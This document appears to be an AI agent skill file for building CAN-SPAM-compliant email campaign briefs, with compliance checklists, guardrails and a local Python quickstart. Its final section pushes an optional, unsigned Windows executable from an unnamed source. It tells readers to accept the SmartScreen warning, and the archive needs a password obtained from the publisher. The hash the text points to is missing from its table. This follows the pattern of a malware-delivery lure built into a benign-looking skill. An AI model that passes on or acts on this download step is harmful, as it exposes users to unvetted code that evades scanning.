Email Campaign Builder
Builds a single-send email campaign brief with the subject line, preheader, body and CTA, and marks the CAN-SPAM and bulk sender elements it must carry. Written for US lifecycle marketers and ecommerce teams that send email from their own sending domain.
Use this skill when someone asks for:
- email campaign builder
- can-spam compliant email template
- email subject line and preheader
- email campaign brief
The job
Marketers draft the body and the footer gets bolted on later, so the postal address, the opt-out and the sender identity go missing on the send that matters.
What you get
- Collect the audience, the offer, the sender identity and the postal address the business mails from.
- Write the subject line, the preheader, the body and one call to action inside the working limits.
- Add the footer elements CAN-SPAM requires and the one-click unsubscribe headers the sending platform needs.
- List every testimonial, price and comparison in the draft and the source the team must supply.
Output contract:
- brief - audience, offer, goal, sender identity and the sending domain
- fields - subject line, preheader, body and call to action inside the working limits
- footer_elements - postal address, opt-out notice, sender name and reason for writing
- deliverability_checks - the authentication records and unsubscribe headers the account needs
- claim_checks - every claim paired with the source the team must supply
US specifics that matter
- CAN-SPAM requires a valid physical postal address, a clear opt-out notice, and that opt-out requests be honored within 10 business days.
- Gmail requires senders of 5,000 or more messages a day to have SPF, DKIM and DMARC records and to support one-click unsubscribe on marketing and subscribed-list messages.
- Gmail tells senders to keep the reported spam rate below 0.10% and never reach 0.30%.
- The FTC's .com Disclosures guidance says a required disclosure has to be clear and conspicuous and placed close to the claim it qualifies.
Guardrails (hard rules)
- Never write a fake urgency, a fake scarcity count or a subject line that misrepresents the contents.
- Never use a customer quote the team has not permission to use, and never present a testimonial as a typical result.
- Never send, schedule or queue the email; the sender pushes it from their own platform.
- Never leave the postal address or the opt-out out of a commercial send.
Quickstart
1. Fill in the brief
templates/email-campaign-brief.yaml is the starting point. Copy it, fill in your own numbers, and
keep the field names - the script reads them by name.
2. Run the script
python3 scripts/build_email_brief.py --input email-campaign-brief.yaml --out ./out
The script is standalone: Python 3 standard library only, no install step, no network calls, no API keys.
3. Check the result against the reference
references/email-legal-basics.md holds the limits, the US rules and the checklist the output has
to satisfy. Read it before you send anything to a customer or a platform.
Required by CAN-SPAM
- Accurate header information: the from name, the from address and the reply-to address.
- A subject line that reflects the content of the message.
- A valid physical postal address of the sender.
- A clear opt-out notice, honored within 10 business days, and the mechanism has to work for at least 30 days.
Delivery requirements at Gmail
- SPF, DKIM and DMARC records for every sending domain, with the From domain aligned.
- One-click unsubscribe headers on marketing and subscribed-list sends from bulk senders.
- A spam rate reported in Postmaster Tools that stays under 0.30%.
- Unsubscribe requests handled promptly; providers ask for same-day handling.
Claims in the body
- A price, a discount, a comparison and a performance number are all advertising claims.
- A testimonial is an endorsement; the material connection has to be disclosed.
- The disclosure has to sit next to the claim, in plain language.
The Windows app (optional)
The workflow above runs anywhere Python 3 runs. If you also want the publisher's Windows multi-tool app for the workflows in this catalog, it is a separate download. This bundle does not contain it, does not install it, and never runs it - you decide whether to fetch it.

| Inside the archive | multitool/toolkit.exe |
Check the download before you run it. PowerShell:
Get-FileHash .\multitool.zip -Algorithm SHA256
The hash must match the value in the table. Then extract the archive and start
multitool/toolkit.exe.
The program is not code-signed, so Windows SmartScreen shows Unknown publisher. Run it only if you accept an unsigned program, keep it in a folder of its own, and do not run it as administrator unless you have a reason to.
The installer asks for a password; ask the publisher for it before you start.
